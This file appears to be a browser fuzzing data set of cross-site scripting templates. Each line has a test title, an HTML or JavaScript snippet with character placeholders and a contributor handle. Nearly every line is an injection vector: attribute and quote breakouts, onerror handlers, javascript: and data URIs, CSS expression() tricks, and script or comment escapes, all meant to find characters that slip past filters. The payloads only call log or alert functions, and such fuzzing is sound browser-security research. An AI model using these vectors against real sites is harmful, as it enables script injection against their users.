aaaaaaaa <b id="id1" x=begin0x9fa0end >`'"></b><script>if (!/begin.end/.test(document.getElementById('id1').getAttribute('x'))) { alert(1);}</script> @PunchyStickMeh
prime browser <b id="id1" x=begin0x2924end >`'"></b><script>if (!/begin.end/.test(document.getElementById('id1').getAttribute('x'))) { alert(1);}</script> @thetestmanager
Alternatives to in attributes <img src=# onerror*chr*"log(*num*)" > @albinowax
Break out of title <title>hello*chr*<*chr**raw1*><script>alert(*num*)</script></title> @0xAli
Characters between rgb <div id="fuzzelement*num*" style="color:r*chr*gb(0,0,0);"></div> @garethheyes
Characters before rgb <div id="fuzzelement*num*" style="color:*chr*rgb(0,0,0);"></div> @garethheyes
Characters allowed before paren <div id="fuzzelement*num*" style="color:rgb*chr*(0,0,0);"></div> @garethheyes
Characters allowed after paren rule <div id="fuzzelement*num*" style="color:rgb(0,0,0)*chr*junk;"></div> @garethheyes
Valid characters after expression 4 <div style="xss:expression(logChr(*num*))\*hex2* junk"></div> @garethheyes
Valid characters after expression 3 <div style="xss:expression(logChr(*num*))'*chr*junk"></div> @garethheyes
Valid characters after expression 2 <div style="xss:expression(logChr(*num*))*chr**chr*junk"></div> @garethheyes
Valid characters after expression <div style="xss:expression(logChr(*num*))*chr*junk"></div> @garethheyes
Opening paren expression check <div style="xss:expression(logChr*chr**num*))">test</div> @garethheyes
Characters that trigger a new attr after new line <img src=1 title= x:xx*chr*/onerror=logChr(*num*)> @garethheyes
Characters eating backslash in javascript string 2 <script>if("x\*chr*".length==2) { log(*num*);}</script> @mhswende
Characters eating backslash in javascript string <script>if("x\*chr*".length==1) { log(*num*);}</script> @mhswende
Quoteless attributes breaker <img src=xxx:xxx title=1*chr*/onerror=logChr(*num*)> @garethheyes
Characters ignored inside javascript string v2 <script>if("x*chr*x" == "xx") { log(*num*);}</script> @mhswende
Characters ignored in html event handler name <img src=x on*chr*Error="javascript:log(*num*)"/> @mhswende
Characters ignored in Javascript function call "`'><script>lo*chr*g(*num*)</script> @mhswende
Replacement for greater than sign *chr*script>log(*num*)</script> @mhswende
Characters allowed between tag and attribute <script*chr*type="text/javascript">log(*num*);</script> @0xAli
Characters which break attributes without quotes <b id="id*num*" x=begin*chr*end >`'"></b><script>if (!/begin.end/.test(document.getElementById('id*num*').getAttribute('x'))) { log(*num*);}</script> @shafigullin
Single quote break <script charset='*chr*>log(*num*)</script> @0xAli
Characters that close a quote <script charset="*chr*>log(*num*)</script> @0xAli
Uncode sequences generating illegitimate ASCII <script> "\ud83d\u*hex4*".match(/.*<.*/) ? log(*num*) : null; </script> @0x6D6172696F
Characters allowed after ampersand in named character references <a href="javascript&*chr*colon;log(*num*)" id="fuzzelement*num*">test</a> @_cweb
Characters ending HTML closing tags (HTML4) <style></style*chr*<img src="about:blank" onerror=log(*num*)//></style> @0x6D6172696F
Characters consuming backslashes and breaking JS strings <script>a='abc\*chr*\';log(*num*)//def';</script> @0x6D6172696F
Events in tags with src or href that execute javascript <*datahtmlelements* data=about:blank background=about:blank action=about:blank type=image/gif src=about:blank href=about:blank *dataevents*="customLog('*datahtmlelements* *dataevents*')"></*datahtmlelements*> @garethheyes
Tags and events that execute javascript 2 <*datahtmlelements* *dataevents*="javascript:parent.customLog('*datahtmlelements* *dataevents*')"></*datahtmlelements*> @garethheyes
Tags and events that execute javascript <*datahtmlelements* *datahtmlattributes*="javascript:parent.customLog('*datahtmlelements* *datahtmlattributes*')"></*datahtmlelements*> @garethheyes
Tags that execute onerror <*datahtmlelements* src=1 href=1 onerror="customLog('*datahtmlelements*')"></*datahtmlelements*> @garethheyes
Does this browser support e4x <script>try{eval("<></>");logBoolean(1)}catch(e){logBoolean(0)};</script> @garethheyes
Characters to separate class names in class attributes <div class="foo*num**chr*bar">HELLO</div> <script>document.getElementsByClassName('foo*num*')[0]?log(*num*):0</script> @0x6D6172696F
Characters allowed after uri host "`'/><img/onload=log(*num*) src="http://shazzer.co.uk*chr*/favicon.ico"/> @jackmasa
Determine what character can replace in end tags <script>log(*num*)<*chr*script> @MisterJyu
Characters that close a HTML comment 002 <!--*chr*<img src=xxx:x onerror=log(*num*)> --> @0x6D6172696F
Characters that close HTML tags <script>log(*num*)</script*chr* @0x6D6172696F
Characters not encoded by encodeURIComponent <script> if ('*uni*' === encodeURIComponent('*uni*')) { log(*num*); } </script> @shafigullin
Characters not encoded by encodeURI <script> if ('*uni*' === encodeURI('*uni*')) { log(*num*); } </script> @shafigullin
Characters allowed after script <script*chr*>log(*num*)</script> @garethheyes
Single character breaking innerHTML copy <div id="fuzzelement*num*"> <div title="*chr*style=color:#FF1133;" id="copyTarget*num*">*num* - test</div> </div> @thewildcat
Entity character breaking innerHTML copy <div id="fuzzelement*num*"> <div title="&#x*hex6*;style=color:#FF1133" id="copyTarget*num*">*num* - test</div> </div> @thewildcat
determine what characters can be inside a script tag "`'><sc*chr*ript>log(*num*)</sc*chr*ript> @MisterJyu
Characters allowed attribute quote "/><img/onerror=*chr*log(*num*)*chr*src=xxx:x /> @jackmasa
determine any chars can go between the onerror attributes <img src="x"*chr**chr*o*chr*n*chr*error="alert(*num*)"> @MisterJyu
Replacement for greater and less than signs (revised) *chr*script*chr* log(*num*) *chr**chr*script*chr @MisterJyu
Replacement for greater and less than signs *chr*script*chr alert(1) *chr**chr*script*chr @MisterJyu
Characters syntactically equivalent to single quote in HTML attributes `"'><img src='#*chr* onerror=log(*num*)> @_cweb
Characters syntactically equivalent to colon in a URI <a href="javascript*chr*alert(1)" id="fuzzelement*num*">test</a> @_cweb
Characters breaking innerHTML copy <div id="fuzzelement*num*"> <div title="*chr**chr*style=color:#FF1133" id="copyTarget*num*">*num* - test</div> </div> @thewildcat
Characters escaping JS comment delimiters 001 <script>/* **chr*/log(*num*)// */</script> @0x6D6172696F
Characters breaking CSS strings allowing expression "'`>ABC<div style="font-family:'foo*chr*;x:expression(log(*num*));/*';">DEF @0x6D6172696F
Characters ending CSS values allowing expressions "'`>ABC<div style="font-family:'foo'*chr*x:expression(log(*num*));/*';">DEF @0x6D6172696F
Characters breaking JavaScript Regex delimiter "'`><script>a=/hello;*chr*;i=0;log(*num*);a/i;</script> @0x6D6172696F
Escape from attribute a closing tag <a href="*chr*><script>log(*num*)</script>" /> @shafigullin
Characters in script inside XML elements 004 "'`><p><svg><script>a='hello*chr*;log(*num*)//';</script></p> @0x6D6172696F
Characters in script inside XML elements 003 <p><svg><script>*chr*og(*num*)</script></p> @0x6D6172696F
Characters in script inside XML elements 002 <p><svg><script>l*chr*og(*num*)</script></p> @0x6D6172696F
Characters in script inside XML elements 001 <p><svg><script>*chr*log(*num*)</script></p> @0x6D6172696F
Space characters in RegExp <script> if ('*chr*'.replace(/\s/g, '') === '') { log(*num*); } </script> @shafigullin
Character between lt and slash in closing tag <script>log(*num*)<*chr*/script> @shafigullin
Characters allowed for padding in a VBS URI 002 <iframe src="vbscript:log*chr**num*"></iframe> @0x6D6172696F
Characters allowed for padding in a VBS URI 001 <iframe src="vbs:log*chr**num*"></iframe> @0x6D6172696F
Characters allowed between CSS expression chars 02 ABC<div style="x:expression*chr*(log(*num*))">DEF @0x6D6172696F
Characters allowed between CSS expression chars 01 ABC<div style="x:exp*chr*ression(log(*num*))">DEF @0x6D6172696F
Characters allowed between CSS colon and expression ABC<div style="x:*chr*expression(log(*num*))">DEF @0x6D6172696F
Characters allowed between CSS prop and expression ABC<div style="x*chr*expression(log(*num*))">DEF @0x6D6172696F
Characters allowed for padding in a data URI 003 <script src="data:text/plain*chr*log(*num*)"></script> @0x6D6172696F
Characters allowed for padding in a data URI 002 <script src="data:*chr*,log(*num*)"></script> @0x6D6172696F
Characters allowed for padding in a data URI 001 <script src="data:text/plain,lo*chr*g(*num*)"></script> @0x6D6172696F
Characters trimmed my trim <script> if ('*chr*'.trim() === '') { log(*num*); } </script> @shafigullin
Characters before paren in Javascript call "'`><script>log*chr*(*num*)</script> @garethheyes
Characters before img "'`><*chr*img src=xxx:x onerror=log(*num*)> @garethheyes
Characters before script '`"><*chr*script>log(*num*)</script> @garethheyes
Characters in between protocol in js url <a href="javas*chr*cript:alert(1)" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed after attribute name `"'><img src=xxx:x onerror*chr*=log(*num*)> @garethheyes
Characters that close JS Comments '"`><script>/* **chr*log(*num*)// */</script> @garethheyes
Characters allowed before protocol in js url <a href="*chr*javascript:alert(1)" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed before colon in js url <a href="javascript*chr*:alert(1)" id="fuzzelement*num*">test</a> @garethheyes
NULL Characters inside JavaScript properties `'"><script>window['log*chr*'](*num*)</script> @garethheyes
Characters allowed before CSS properties '"`><div id="fuzzelement*num*" style="*chr*color:#000000;"></div> @garethheyes
Characters allowed before a JavaScript function "`'><script>*chr*log(*num*)</script> @garethheyes
Characters that close a HTML comment --><!-- --*chr*> <img src=xxx:x onerror=log(*num*)> --> @garethheyes
Characters allowed before attribute name `"'><img src=xxx:x *chr*onerror=log(*num*)> @garethheyes